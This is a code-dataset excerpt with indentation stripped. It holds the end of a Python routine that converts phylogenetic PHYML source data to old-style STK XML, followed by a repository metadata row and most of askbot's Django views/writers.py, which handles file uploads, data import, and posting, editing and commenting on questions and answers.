taxa_type = etree.SubElement(taxa_data,"mixed_fossil_and_extant")
# We *should* add a taxon here to make sure this is valid
# phyml according to the schema. However, in doin so we will fail the
# taxon check as we don't know which taxon (or taxa) is a fossil, as
# this in formation is not recorded in the old STK XML files.
# We therefore leave this commented out as a reminder to the
# next soul to edit this
#taxon = etree.SubElement(taxa_type,"taxon")
character_data = etree.SubElement(source_tree,"character_data")
# loop over characters add correctly
chars = find_mol(input_xml)
for c in chars:
new_char = etree.SubElement(character_data,"character")
new_char.attrib['type'] = "molecular"
new_char.attrib['name'] = c.text
chars = find_morph(input_xml)
for c in chars:
new_char = etree.SubElement(character_data,"character")
new_char.attrib['type'] = "morphological"
new_char.attrib['name'] = c.text
chars = find_behave(input_xml)
for c in chars:
new_char = etree.SubElement(character_data,"character")
new_char.attrib['type'] = "behavioural"
new_char.attrib['name'] = c.text
chars = find_other(input_xml)
for c in chars:
new_char = etree.SubElement(character_data,"character")
new_char.attrib['type'] = "other"
new_char.attrib['name'] = c.text
return source_tree
def create_xml_metadata(XML_string, this_source, filename):
""" Converts a PHYML source block to the old style XML file"""
XML = etree.fromstring(XML_string)
source_XML = etree.fromstring(this_source)
# from file name we can construct new tree object
try:
stk.p4.var.warnReadNoFile = False
stk.p4.var.trees = []
stk.p4.read(filename+'.tre')
stk.p4.var.warnReadNoFile = True
except:
raise stk_exceptions.TreeParseError("Error parsing " + filename)
trees = stk.p4.var.trees
stk.p4.var.trees = []
tree = trees[0]
taxa_list = tree.getAllLeafNames(0)
new_xml = etree.Element("SourceTree")
# The source publication info
source = etree.SubElement(new_xml,"Source")
author = etree.SubElement(source,"Author")
find_authors = etree.XPath("//author")
authors = find_authors(XML)
authors_list = ''
for a in authors:
s = a.xpath('surname/string_value')[0].text
o = ''
try:
o = a.xpath('other_names/string_value')[0].text
except:
pass
if (authors_list != ''):
authors_list = authors_list+" and "
authors_list += s
if (not o == ''):
authors_list += ", "+o+"."
author.text = authors_list
year = etree.SubElement(source,"Year")
year.text = XML.xpath("//year/integer_value")[0].text
title = etree.SubElement(source,"Title")
title.text = XML.xpath("//title/string_value")[0].text
journal = etree.SubElement(source,"Journal")
if (len(XML.xpath("//journal/string_value")) > 0):
journal.text = XML.xpath("//journal/string_value")[0].text
volume = etree.SubElement(source,"Volume")
if (len(XML.xpath("//volume/string_value")) > 0):
volume.text = XML.xpath("//volume/string_value")[0].text
book = etree.SubElement(source,"Booktitle")
if (len(XML.xpath("//booktitle/string_value")) > 0):
book.text = XML.xpath("//booktitle/string_value")[0].text
page = etree.SubElement(source,"Pages")
if (len(XML.xpath("//pages/string_value")) > 0):
tmp_txt = XML.xpath("//pages/string_value")[0].text
if not tmp_txt == None:
tmp_txt = tmp_txt.replace("–","-")
else:
tmp_txt = ""
page.text = tmp_txt
editor = etree.SubElement(source,"Editor")
find_editors= etree.XPath("//editor/surname")
surnames = find_editors(XML)
authors_list = ''
for s in surnames:
if (authors_list != ''):
authors_list = authors_list+" and "
authors_list += s.xpath('string_value')[0].text
editor.text = authors_list
publisher = etree.SubElement(source, "Publisher")
if (len(XML.xpath("//publisher/string_value")) > 0):
publisher.text = XML.xpath("//publisher/string_value")[0].text
# The taxa info
taxa = etree.SubElement(new_xml,"Taxa")
# add List for the number of taxa
for t in taxa_list:
l = etree.SubElement(taxa, "List")
t = t.replace('_',' ')
l.text = t
# if we find any taxa will fossil switched on, then add fossil attribute
find_fossil = etree.XPath("//fossil")
if (len(find_fossil(source_XML)) == 0):
taxa.attrib['fossil'] = 'none'
elif (len(find_fossil(source_XML)) == len(taxa_list)):
taxa.attrib['fossil'] = 'all'
else:
taxa.attrib['fossil'] = 'some'
taxa.attrib['number'] = str(len(taxa_list))
# character data
character = etree.SubElement(new_xml,"Characters")
find_characters = etree.XPath("//character")
characters_phyml = find_characters(source_XML)
nMolecular = 0
nMorpho = 0
nBehaviour = 0
nOther = 0
molecular = etree.SubElement(character,"Molecular")
morphological = etree.SubElement(character,"Morphological")
behavioural = etree.SubElement(character,"Behavioural")
other = etree.SubElement(character,"Other")
for c in characters_phyml:
if c.attrib['type'] == 'molecular':
l = etree.SubElement(molecular,"Type")
l.text = c.attrib['name']
nMolecular += 1
if c.attrib['type'] == 'behavioural':
l = etree.SubElement(behavioural,"Type")
l.text = c.attrib['name']
nBehaviour += 1
if c.attrib['type'] == 'morphological':
l = etree.SubElement(morphological,"Type")
l.text = c.attrib['name']
nMorpho += 1
if c.attrib['type'] == 'other':
l = etree.SubElement(other,"Type")
l.text = c.attrib['name']
nOther += 0
if (nMolecular > 0):
molecular.attrib['number'] = str(nMolecular)
if (nBehaviour > 0):
behavioural.attrib['number'] = str(nBehaviour)
if (nMorpho > 0):
morphological.attrib['number'] = str(nMorpho)
if (nOther > 0):
other.attrib['number'] = str(nOther)
# analysis data
analysis = etree.SubElement(new_xml,"Analysis")
find_analysis = etree.XPath("//analysis")
analysis_phyml = find_analysis(source_XML)
for a in analysis_phyml:
l = etree.SubElement(analysis,"Type")
l.text = a.attrib['name']
# tree file - same directory :)
tree_f = etree.SubElement(new_xml,"TreeFile")
tree_file_only = os.path.basename(filename)
tree_file_only += '.tre'
tree_f.text = tree_file_only
# Grab any comments under the tree and add it here
notes = etree.SubElement(new_xml,'Notes')
find_comments = etree.XPath("//comment")
comments_phyml = find_comments(source_XML)
comments = ""
for c in comments_phyml:
if (not c.text == None):
if (not comments == ""):
comments = "\n" + c.text
else:
comments += c.text
notes.text = comments
xml_string = etree.tostring(new_xml, encoding='iso-8859-1', pretty_print=True)
f = open(filename+'.xml','w')
f.write(xml_string)
f.close()
#def _capitalise_source_name(name):
# "Capiltalises a source name, taking into account etal
# smith_jones_2003 -> Smith_Jones_2003
# smith_etal_2003 -> Smith_etal_2003
# etc
# """
| gpl-3.0 | 6,061,260,257,360,899,000 | 35.871961 | 120 | 0.617275 | false |
divio/askbot-devel | askbot/views/writers.py | 1 | 39556 | # encoding:utf-8
"""
:synopsis: views diplaying and processing main content post forms
This module contains views that allow adding, editing, and deleting main textual content.
"""
import datetime
import logging
import os
import os.path
import random
import sys
import tempfile
import time
from django.shortcuts import get_object_or_404
from django.shortcuts import render
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import User
from django.http import HttpResponse
from django.http import HttpResponseBadRequest
from django.http import HttpResponseForbidden
from django.http import HttpResponseRedirect
from django.http import Http404
from django.utils import simplejson
from django.utils.html import strip_tags, escape
from django.utils.translation import get_language
from django.utils.translation import ugettext as _
from django.utils.translation import ugettext_lazy
from django.core.urlresolvers import reverse
from django.core import exceptions
from django.conf import settings
from django.views.decorators import csrf
from django.contrib.auth.models import User
from askbot import exceptions as askbot_exceptions
from askbot import forms
from askbot import models
from askbot import signals
from askbot.conf import settings as askbot_settings
from askbot.utils import decorators
from askbot.utils.forms import format_errors
from askbot.utils.functions import diff_date
from askbot.utils import url_utils
from askbot.utils.file_utils import store_file
from askbot.utils.loading import load_module
from askbot.views import context
from askbot.templatetags import extra_filters_jinja as template_filters
from askbot.importers.stackexchange import management as stackexchange#todo: may change
from askbot.utils.slug import slugify
from recaptcha_works.decorators import fix_recaptcha_remote_ip
# used in index page
INDEX_PAGE_SIZE = 20
INDEX_AWARD_SIZE = 15
INDEX_TAGS_SIZE = 100
# used in tags list
DEFAULT_PAGE_SIZE = 60
# used in questions
QUESTIONS_PAGE_SIZE = 10
# used in answers
ANSWERS_PAGE_SIZE = 10
#todo: make this work with csrf
@csrf.csrf_exempt
def upload(request):#ajax upload file to a question or answer
"""view that handles file upload via Ajax
"""
# check upload permission
result = ''
error = ''
new_file_name = ''
try:
#may raise exceptions.PermissionDenied
result, error, file_url, orig_file_name = None, '', None, None
if request.user.is_anonymous():
msg = _('Sorry, anonymous users cannot upload files')
raise exceptions.PermissionDenied(msg)
request.user.assert_can_upload_file()
#todo: build proper form validation
file_name_prefix = request.POST.get('file_name_prefix', '')
if file_name_prefix not in ('', 'group_logo_'):
raise exceptions.PermissionDenied('invalid upload file name prefix')
#todo: check file type
uploaded_file = request.FILES['file-upload']#take first file
orig_file_name = uploaded_file.name
#todo: extension checking should be replaced with mimetype checking
#and this must be part of the form validation
file_extension = os.path.splitext(orig_file_name)[1].lower()
if not file_extension in settings.ASKBOT_ALLOWED_UPLOAD_FILE_TYPES:
file_types = "', '".join(settings.ASKBOT_ALLOWED_UPLOAD_FILE_TYPES)
msg = _("allowed file types are '%(file_types)s'") % \
{'file_types': file_types}
raise exceptions.PermissionDenied(msg)
# generate new file name and storage object
file_storage, new_file_name, file_url = store_file(
uploaded_file, file_name_prefix
)
# check file size
# byte
size = file_storage.size(new_file_name)
if size > settings.ASKBOT_MAX_UPLOAD_FILE_SIZE:
file_storage.delete(new_file_name)
msg = _("maximum upload file size is %(file_size)sK") % \
{'file_size': settings.ASKBOT_MAX_UPLOAD_FILE_SIZE}
raise exceptions.PermissionDenied(msg)
except exceptions.PermissionDenied, e:
error = unicode(e)
except Exception, e:
logging.critical(unicode(e))
error = _('Error uploading file. Please contact the site administrator. Thank you.')
if error == '':
result = 'Good'
else:
result = ''
file_url = ''
#data = simplejson.dumps({
# 'result': result,
# 'error': error,
# 'file_url': file_url
#})
#return HttpResponse(data, mimetype = 'application/json')
xml_template = "<result><msg><![CDATA[%s]]></msg><error><![CDATA[%s]]></error><file_url>%s</file_url><orig_file_name><![CDATA[%s]]></orig_file_name></result>"
xml = xml_template % (result, error, file_url, orig_file_name)
return HttpResponse(xml, content_type="application/xml")
def __import_se_data(dump_file):
"""non-view function that imports the SE data
in the future may import other formats as well
In this function stdout is temporarily
redirected, so that the underlying importer management
command could stream the output to the browser
todo: maybe need to add try/except clauses to restore
the redirects in the exceptional situations
"""
fake_stdout = tempfile.NamedTemporaryFile()
real_stdout = sys.stdout
sys.stdout = fake_stdout
importer = stackexchange.ImporterThread(dump_file = dump_file.name)
importer.start()
#run a loop where we'll be reading output of the
#importer tread and yielding it to the caller
read_stdout = open(fake_stdout.name, 'r')
file_pos = 0
fd = read_stdout.fileno()
yield '<html><body><style>* {font-family: sans;} p {font-size: 12px; line-height: 16px; margin: 0; padding: 0;}</style><h1>Importing your data. This may take a few minutes...</h1>'
while importer.isAlive():
c_size = os.fstat(fd).st_size
if c_size > file_pos:
line = read_stdout.readline()
yield '<p>' + line + '</p>'
file_pos = read_stdout.tell()
fake_stdout.close()
read_stdout.close()
dump_file.close()
sys.stdout = real_stdout
yield '<p>Done. Please, <a href="%s">Visit Your Forum</a></p></body></html>' % reverse('index')
@csrf.csrf_protect
def import_data(request):
"""a view allowing the site administrator
upload stackexchange data
"""
#allow to use this view to site admins
#or when the forum in completely empty
if request.user.is_anonymous() or (not request.user.is_administrator()):
if models.Post.objects.get_questions().exists():
raise Http404
if request.method == 'POST':
#if not request.is_ajax():
# raise Http404
form = forms.DumpUploadForm(request.POST, request.FILES)
if form.is_valid():
dump_file = form.cleaned_data['dump_file']
dump_storage = tempfile.NamedTemporaryFile()
#save the temp file
for chunk in dump_file.chunks():
dump_storage.write(chunk)
dump_storage.flush()
return HttpResponse(__import_se_data(dump_storage))
#yield HttpResponse(_('StackExchange import complete.'), content_type='text/plain')
#dump_storage.close()
else:
form = forms.DumpUploadForm()
data = {
'dump_upload_form': form,
'need_configuration': (not stackexchange.is_ready())
}
return render(request, 'import_data.html', data)
@fix_recaptcha_remote_ip
@csrf.csrf_protect
@decorators.check_authorization_to_post(ugettext_lazy('Please log in to make posts'))
@decorators.check_spam('text')
def ask(request):#view used to ask a new question
"""a view to ask a new question
gives space for q title, body, tags and checkbox for to post as wiki
user can start posting a question anonymously but then
must login/register in order for the question go be shown
"""
if request.user.is_authenticated():
if request.user.is_read_only():
referer = request.META.get("HTTP_REFERER", reverse('questions'))
request.user.message_set.create(message=_('Sorry, but you have only read access'))
return HttpResponseRedirect(referer)
if askbot_settings.READ_ONLY_MODE_ENABLED:
return HttpResponseRedirect(reverse('index'))
if request.method == 'POST':
form = forms.AskForm(request.POST, user=request.user)
if form.is_valid():
timestamp = datetime.datetime.now()
title = form.cleaned_data['title']
wiki = form.cleaned_data['wiki']
tagnames = form.cleaned_data['tags']
text = form.cleaned_data['text']
ask_anonymously = form.cleaned_data['ask_anonymously']
post_privately = form.cleaned_data['post_privately']
group_id = form.cleaned_data.get('group_id', None)
language = form.cleaned_data.get('language', None)
if request.user.is_authenticated():
drafts = models.DraftQuestion.objects.filter(author=request.user)
drafts.delete()
user = form.get_post_user(request.user)
elif request.user.is_anonymous() and askbot_settings.ALLOW_ASK_UNREGISTERED:
user = models.get_or_create_anonymous_user()
ask_anonymously = True
else:
user = None
if user:
try:
question = user.post_question(
title=title,
body_text=text,
tags=tagnames,
wiki=wiki,
is_anonymous=ask_anonymously,
is_private=post_privately,
timestamp=timestamp,
group_id=group_id,
language=language,
ip_addr=request.META.get('REMOTE_ADDR')
)
signals.new_question_posted.send(None,
question=question,
user=user,
form_data=form.cleaned_data
)
return HttpResponseRedirect(question.get_absolute_url())
except exceptions.PermissionDenied, e:
request.user.message_set.create(message = unicode(e))
return HttpResponseRedirect(reverse('index'))
else:
request.session.flush()
session_key=request.session.session_key
models.AnonymousQuestion.objects.create(
session_key=session_key,
title=title,
tagnames=tagnames,
wiki=wiki,
is_anonymous=ask_anonymously,
text=text,
added_at=timestamp,
ip_addr=request.META.get('REMOTE_ADDR'),
)
return HttpResponseRedirect(url_utils.get_login_url())
if request.method == 'GET':
form = forms.AskForm(user=request.user)
draft_title = ''
draft_text = ''
draft_tagnames = ''
if request.user.is_authenticated():
drafts = models.DraftQuestion.objects.filter(author=request.user)
if len(drafts) > 0:
draft = drafts[0]
draft_title = draft.title
draft_text = draft.text
draft_tagnames = draft.tagnames
form.initial = {
'ask_anonymously': request.REQUEST.get('ask_anonymously', False),
'tags': request.REQUEST.get('tags', draft_tagnames),
'text': request.REQUEST.get('text', draft_text),
'title': request.REQUEST.get('title', draft_title),
'post_privately': request.REQUEST.get('post_privately', False),
'language': get_language(),
'wiki': request.REQUEST.get('wiki', False),
}
if 'group_id' in request.REQUEST:
try:
group_id = int(request.GET.get('group_id', None))
form.initial['group_id'] = group_id
except Exception:
pass
editor_is_folded = (askbot_settings.QUESTION_BODY_EDITOR_MODE=='folded' and \
askbot_settings.MIN_QUESTION_BODY_LENGTH==0 and \
form.initial['text'] == '')
data = {
'active_tab': 'ask',
'page_class': 'ask-page',
'form' : form,
'editor_is_folded': editor_is_folded,
'mandatory_tags': models.tag.get_mandatory_tags(),
'email_validation_faq_url':reverse('faq') + '#validate',
'category_tree_data': askbot_settings.CATEGORY_TREE,
'tag_names': list()#need to keep context in sync with edit_question for tag editor
}
data.update(context.get_for_tag_editor())
return render(request, 'ask.html', data)
@login_required
@csrf.csrf_protect
def retag_question(request, id):
"""retag question view
"""
question = get_object_or_404(models.Post, id=id)
try:
request.user.assert_can_retag_question(question)
if request.method == 'POST':
form = forms.RetagQuestionForm(question, request.POST)
if form.is_valid():
if form.has_changed():
request.user.retag_question(question=question, tags=form.cleaned_data['tags'])
if request.is_ajax():
response_data = {
'success': True,
'new_tags': question.thread.tagnames
}
if request.user.message_set.count() > 0:
#todo: here we will possibly junk messages
message = request.user.get_and_delete_messages()[-1]
response_data['message'] = message
data = simplejson.dumps(response_data)
return HttpResponse(data, content_type="application/json")
else:
return HttpResponseRedirect(question.get_absolute_url())
elif request.is_ajax():
response_data = {
'message': format_errors(form.errors['tags']),
'success': False
}
data = simplejson.dumps(response_data)
return HttpResponse(data, content_type="application/json")
else:
form = forms.RetagQuestionForm(question)
data = {
'active_tab': 'questions',
'question': question,
'form' : form,
}
return render(request, 'question_retag.html', data)
except exceptions.PermissionDenied, e:
if request.is_ajax():
response_data = {
'message': unicode(e),
'success': False
}
data = simplejson.dumps(response_data)
return HttpResponse(data, content_type="application/json")
else:
request.user.message_set.create(message = unicode(e))
return HttpResponseRedirect(question.get_absolute_url())
@login_required
@csrf.csrf_protect
@decorators.check_spam('text')
@fix_recaptcha_remote_ip
def edit_question(request, id):
"""edit question view
"""
question = get_object_or_404(models.Post, id=id)
if askbot_settings.READ_ONLY_MODE_ENABLED:
return HttpResponseRedirect(question.get_absolute_url())
try:
revision = question.revisions.get(revision=0)
except models.PostRevision.DoesNotExist:
revision = question.get_latest_revision()
revision_form = None
try:
request.user.assert_can_edit_question(question)
if request.method == 'POST':
if request.POST['select_revision'] == 'true':
#revert-type edit - user selected previous revision
revision_form = forms.RevisionForm(
question,
revision,
request.POST
)
if revision_form.is_valid():
# Replace with those from the selected revision
rev_id = revision_form.cleaned_data['revision']
revision = question.revisions.get(revision = rev_id)
form = forms.EditQuestionForm(
question=question,
user=request.user,
revision=revision
)
else:
form = forms.EditQuestionForm(
request.POST,
question=question,
user=question.user,
revision=revision
)
else:#new content edit
# Always check modifications against the latest revision
form = forms.EditQuestionForm(
request.POST,
question=question,
revision=revision,
user=request.user,
)
revision_form = forms.RevisionForm(question, revision)
if form.is_valid():
if form.has_changed():
if form.can_edit_anonymously() and form.cleaned_data['reveal_identity']:
question.thread.remove_author_anonymity()
question.is_anonymous = False
is_wiki = form.cleaned_data.get('wiki', question.wiki)
post_privately = form.cleaned_data['post_privately']
suppress_email = form.cleaned_data['suppress_email']
user = form.get_post_user(request.user)
user.edit_question(
question=question,
title=form.cleaned_data['title'],
body_text=form.cleaned_data['text'],
revision_comment=form.cleaned_data['summary'],
tags=form.cleaned_data['tags'],
wiki=is_wiki,
edit_anonymously=form.cleaned_data['edit_anonymously'],
is_private=post_privately,
suppress_email=suppress_email,
ip_addr=request.META.get('REMOTE_ADDR')
)
if 'language' in form.cleaned_data:
question.thread.set_language_code(form.cleaned_data['language'])
return HttpResponseRedirect(question.get_absolute_url())
else:
#request type was "GET"
revision_form = forms.RevisionForm(question, revision)
initial = {
'language': question.thread.language_code,
'post_privately': question.is_private(),
'wiki': question.wiki
}
form = forms.EditQuestionForm(
question=question,
revision=revision,
user=request.user,
initial=initial
)
data = {
'page_class': 'edit-question-page',
'active_tab': 'questions',
'question': question,
'revision': revision,
'revision_form': revision_form,
'mandatory_tags': models.tag.get_mandatory_tags(),
'form' : form,
'tag_names': question.thread.get_tag_names(),
'category_tree_data': askbot_settings.CATEGORY_TREE
}
data.update(context.get_for_tag_editor())
return render(request, 'question_edit.html', data)
except exceptions.PermissionDenied, e:
request.user.message_set.create(message = unicode(e))
return HttpResponseRedirect(question.get_absolute_url())
@login_required
@csrf.csrf_protect
@decorators.check_spam('text')
@fix_recaptcha_remote_ip
def edit_answer(request, id):
answer = get_object_or_404(models.Post, id=id)
if askbot_settings.READ_ONLY_MODE_ENABLED:
return HttpResponseRedirect(answer.get_absolute_url())
try:
revision = answer.revisions.get(revision=0)
except models.PostRevision.DoesNotExist:
revision = answer.get_latest_revision()
class_path = getattr(settings, 'ASKBOT_EDIT_ANSWER_FORM', None)
if class_path:
edit_answer_form_class = load_module(class_path)
else:
edit_answer_form_class = forms.EditAnswerForm
try:
request.user.assert_can_edit_answer(answer)
if request.method == "POST":
if request.POST['select_revision'] == 'true':
# user has changed revistion number
revision_form = forms.RevisionForm(
answer,
revision,
request.POST
)
if revision_form.is_valid():
# Replace with those from the selected revision
rev = revision_form.cleaned_data['revision']
revision = answer.revisions.get(revision = rev)
form = edit_answer_form_class(
answer, revision, user=request.user
)
else:
form = edit_answer_form_class(
answer,
revision,
request.POST,
user=request.user
)
else:
form = edit_answer_form_class(
answer, revision, request.POST, user=request.user
)
revision_form = forms.RevisionForm(answer, revision)
if form.is_valid():
if form.has_changed():
user = form.get_post_user(request.user)
suppress_email = form.cleaned_data['suppress_email']
is_private = form.cleaned_data.get('post_privately', False)
user.edit_answer(
answer=answer,
body_text=form.cleaned_data['text'],
revision_comment=form.cleaned_data['summary'],
wiki=form.cleaned_data.get('wiki', answer.wiki),
is_private=is_private,
suppress_email=suppress_email,
ip_addr=request.META.get('REMOTE_ADDR')
)
signals.answer_edited.send(None,
answer=answer,
user=user,
form_data=form.cleaned_data
)
return HttpResponseRedirect(answer.get_absolute_url())
else:
revision_form = forms.RevisionForm(answer, revision)
form = edit_answer_form_class(answer, revision, user=request.user)
if request.user.can_make_group_private_posts():
form.initial['post_privately'] = answer.is_private()
data = {
'page_class': 'edit-answer-page',
'active_tab': 'questions',
'answer': answer,
'revision': revision,
'revision_form': revision_form,
'form': form,
}
extra_context = context.get_extra(
'ASKBOT_EDIT_ANSWER_PAGE_EXTRA_CONTEXT',
request,
data
)
data.update(extra_context)
return render(request, 'answer_edit.html', data)
except exceptions.PermissionDenied, e:
request.user.message_set.create(message = unicode(e))
return HttpResponseRedirect(answer.get_absolute_url())
#todo: rename this function to post_new_answer
@decorators.check_authorization_to_post(ugettext_lazy('Please log in to make posts'))
@decorators.check_spam('text')
@fix_recaptcha_remote_ip
def answer(request, id, form_class=forms.AnswerForm):#process a new answer
"""view that posts new answer
anonymous users post into anonymous storage
and redirected to login page
authenticated users post directly
"""
question = get_object_or_404(models.Post, post_type='question', id=id)
if askbot_settings.READ_ONLY_MODE_ENABLED:
return HttpResponseRedirect(question.get_absolute_url())
if request.method == "POST":
#this check prevents backward compatilibility
if form_class == forms.AnswerForm:
custom_class_path = getattr(settings, 'ASKBOT_NEW_ANSWER_FORM', None)
if custom_class_path:
form_class = load_module(custom_class_path)
else:
form_class = forms.AnswerForm
form = form_class(request.POST, user=request.user)
if form.is_valid():
if request.user.is_authenticated():
drafts = models.DraftAnswer.objects.filter(
author=request.user,
thread=question.thread
)
drafts.delete()
user = form.get_post_user(request.user)
try:
answer = form.save(
question,
user,
ip_addr=request.META.get('REMOTE_ADDR')
)
signals.new_answer_posted.send(None,
answer=answer,
user=user,
form_data=form.cleaned_data
)
return HttpResponseRedirect(answer.get_absolute_url())
except askbot_exceptions.AnswerAlreadyGiven, e:
request.user.message_set.create(message = unicode(e))
answer = question.thread.get_answers_by_user(user)[0]
return HttpResponseRedirect(answer.get_absolute_url())
except exceptions.PermissionDenied, e:
request.user.message_set.create(message = unicode(e))
else:
request.session.flush()
models.AnonymousAnswer.objects.create(
question=question,
wiki=form.cleaned_data['wiki'],
text=form.cleaned_data['text'],
session_key=request.session.session_key,
ip_addr=request.META.get('REMOTE_ADDR'),
)
return HttpResponseRedirect(url_utils.get_login_url())
return HttpResponseRedirect(question.get_absolute_url())
def __generate_comments_json(obj, user, avatar_size):
"""non-view generates json data for the post comments
"""
models.Post.objects.precache_comments(for_posts=[obj], visitor=user)
comments = obj._cached_comments
# {"Id":6,"PostId":38589,"CreationDate":"an hour ago","Text":"hello there!","UserDisplayName":"Jarrod Dixon","UserUrl":"/users/3/jarrod-dixon","DeleteUrl":null}
json_comments = []
for comment in comments:
if user and user.is_authenticated():
try:
user.assert_can_delete_comment(comment)
#/posts/392845/comments/219852/delete
#todo translate this url
is_deletable = True
except exceptions.PermissionDenied:
is_deletable = False
is_editable = template_filters.can_edit_comment(user, comment)
else:
is_deletable = False
is_editable = False
comment_owner = comment.author
tz = ' ' + template_filters.TIMEZONE_STR
comment_data = {'id' : comment.id,
'object_id': obj.id,
'comment_added_at': str(comment.added_at.replace(microsecond = 0)) + tz,
'html': comment.html,
'user_display_name': escape(comment_owner.username),
'user_profile_url': comment_owner.get_profile_url(),
'user_avatar_url': comment_owner.get_avatar_url(avatar_size),
'user_id': comment_owner.id,
'user_is_administrator': comment_owner.is_administrator(),
'user_is_moderator': comment_owner.is_moderator(),
'is_deletable': is_deletable,
'is_editable': is_editable,
'points': comment.points,
'score': comment.points, #to support js
'upvoted_by_user': getattr(comment, 'upvoted_by_user', False)
}
json_comments.append(comment_data)
data = simplejson.dumps(json_comments)
return HttpResponse(data, content_type="application/json")
@csrf.csrf_protect
@decorators.check_spam('comment')
def post_comments(request):#generic ajax handler to load comments to an object
"""todo: fixme: post_comments is ambigous:
means either get comments for post or
add a new comment to post
"""
# only support get post comments by ajax now
post_type = request.REQUEST.get('post_type', '')
if not request.is_ajax() or post_type not in ('question', 'answer'):
raise Http404 # TODO: Shouldn't be 404! More like 400, 403 or sth more specific
if post_type == 'question' \
and askbot_settings.QUESTION_COMMENTS_ENABLED == False:
raise Http404
elif post_type == 'answer' \
and askbot_settings.ANSWER_COMMENTS_ENABLED == False:
raise Http404
user = request.user
if request.method == 'POST':
form = forms.NewCommentForm(request.POST)
elif request.method == 'GET':
form = forms.GetCommentDataForPostForm(request.GET)
if form.is_valid() == False:
return HttpResponseBadRequest(
_('This content is forbidden'),
mimetype='application/json'
)
post_id = form.cleaned_data['post_id']
avatar_size = form.cleaned_data['avatar_size']
try:
post = models.Post.objects.get(id=post_id)
except models.Post.DoesNotExist:
return HttpResponseBadRequest(
_('Post not found'), mimetype='application/json'
)
if request.method == "GET":
response = __generate_comments_json(post, user, avatar_size)
elif request.method == "POST":
try:
if user.is_anonymous():
msg = _('Sorry, you appear to be logged out and '
'cannot post comments. Please '
'<a href="%(sign_in_url)s">sign in</a>.') % \
{'sign_in_url': url_utils.get_login_url()}
raise exceptions.PermissionDenied(msg)
if askbot_settings.READ_ONLY_MODE_ENABLED:
raise exceptions.PermissionDenied(askbot_settings.READ_ONLY_MESSAGE)
comment = user.post_comment(
parent_post=post,
body_text=form.cleaned_data['comment'],
ip_addr=request.META.get('REMOTE_ADDR')
)
signals.new_comment_posted.send(None,
comment=comment,
user=user,
form_data=form.cleaned_data
)
response = __generate_comments_json(post, user, avatar_size)
except exceptions.PermissionDenied, e:
response = HttpResponseForbidden(unicode(e), content_type="application/json")
return response
@csrf.csrf_protect
@decorators.ajax_only
#@decorators.check_spam('comment')
def edit_comment(request):
if request.user.is_anonymous():
raise exceptions.PermissionDenied(_('Sorry, anonymous users cannot edit comments'))
if askbot_settings.READ_ONLY_MODE_ENABLED:
raise exceptions.PermissionDenied(askbot_settings.READ_ONLY_MESSAGE)
form = forms.EditCommentForm(request.POST)
if form.is_valid() == False:
raise exceptions.PermissionDenied('This content is forbidden')
comment_post = models.Post.objects.get(
post_type='comment',
id=form.cleaned_data['comment_id']
)
revision = request.user.edit_comment(
comment_post=comment_post,
body_text=form.cleaned_data['comment'],
suppress_email=form.cleaned_data['suppress_email'],
ip_addr=request.META.get('REMOTE_ADDR'),
)
is_deletable = template_filters.can_delete_comment(
comment_post.author, comment_post)
is_editable = template_filters.can_edit_comment(
comment_post.author, comment_post)
tz = ' ' + template_filters.TIMEZONE_STR
tz = template_filters.TIMEZONE_STR
timestamp = str(comment_post.added_at.replace(microsecond=0)) + tz
#need this because the post.text is due to the latest approved
#revision, but we may need the suggested revision
comment_post.text = revision.text
comment_post.html = comment_post.parse_post_text()['html']
return {
'id' : comment_post.id,
'object_id': comment_post.parent.id,
'comment_added_at': timestamp,
'html': comment_post.html,
'user_display_name': escape(comment_post.author.username),
'user_url': comment_post.author.get_profile_url(),
'user_id': comment_post.author.id,
'is_deletable': is_deletable,
'is_editable': is_editable,
'score': comment_post.points, #to support unchanged js
'points': comment_post.points,
'voted': comment_post.is_upvoted_by(request.user),
}
@csrf.csrf_protect
def delete_comment(request):
"""ajax handler to delete comment
"""
try:
if request.user.is_anonymous():
msg = _('Sorry, you appear to be logged out and '
'cannot delete comments. Please '
'<a href="%(sign_in_url)s">sign in</a>.') % \
{'sign_in_url': url_utils.get_login_url()}
raise exceptions.PermissionDenied(msg)
if request.is_ajax():
form = forms.ProcessCommentForm(request.POST)
if form.is_valid() == False:
return HttpResponseBadRequest()
comment_id = form.cleaned_data['comment_id']
comment = get_object_or_404(models.Post, post_type='comment', id=comment_id)
request.user.assert_can_delete_comment(comment)
if askbot_settings.READ_ONLY_MODE_ENABLED:
raise exceptions.PermissionDenied(askbot_settings.READ_ONLY_MESSAGE)
parent = comment.parent
comment.delete()
#attn: recalc denormalized field
parent.comment_count = parent.comments.count()
parent.save()
parent.thread.reset_cached_data()
avatar_size = form.cleaned_data['avatar_size']
return __generate_comments_json(parent, request.user, avatar_size)
raise exceptions.PermissionDenied(
_('sorry, we seem to have some technical difficulties')
)
except exceptions.PermissionDenied, e:
return HttpResponseForbidden(
unicode(e),
mimetype = 'application/json'
)
@login_required
@decorators.post_only
@csrf.csrf_protect
def comment_to_answer(request):
if request.user.is_anonymous():
msg = _('Sorry, only logged in users can convert comments to answers. '
'Please <a href="%(sign_in_url)s">sign in</a>.') % \
{'sign_in_url': url_utils.get_login_url()}
raise exceptions.PermissionDenied(msg)
form = forms.ConvertCommentForm(request.POST)
if form.is_valid() == False:
raise Http404
comment = get_object_or_404(
models.Post,
post_type='comment',
id=form.cleaned_data['comment_id']
)
if askbot_settings.READ_ONLY_MODE_ENABLED is False:
request.user.repost_comment_as_answer(comment)
return HttpResponseRedirect(comment.get_absolute_url())
@decorators.post_only
@csrf.csrf_protect
#todo: change the urls config for this
def repost_answer_as_comment(request, destination=None):
assert(
destination in (
'comment_under_question',
'comment_under_previous_answer'
)
)
if request.user.is_anonymous():
msg = _('Sorry, only logged in users can convert answers to comments. '
'Please <a href="%(sign_in_url)s">sign in</a>.') % \
{'sign_in_url': url_utils.get_login_url()}
raise exceptions.PermissionDenied(msg)
answer_id = request.POST.get('answer_id')
if answer_id:
try:
answer_id = int(answer_id)
except (ValueError, TypeError):
raise Http404
answer = get_object_or_404(models.Post,
post_type = 'answer', id=answer_id)
if askbot_settings.READ_ONLY_MODE_ENABLED:
return HttpResponseRedirect(answer.get_absolute_url())
request.user.assert_can_convert_post(post=answer)
if destination == 'comment_under_question':
destination_post = answer.thread._question_post()
else:
#comment_under_previous_answer
destination_post = answer.get_previous_answer(user=request.user)
#todo: implement for comment under other answer
if destination_post is None:
message = _('Error - could not find the destination post')
request.user.message_set.create(message=message)
return HttpResponseRedirect(answer.get_absolute_url())
if len(answer.text) <= askbot_settings.MAX_COMMENT_LENGTH:
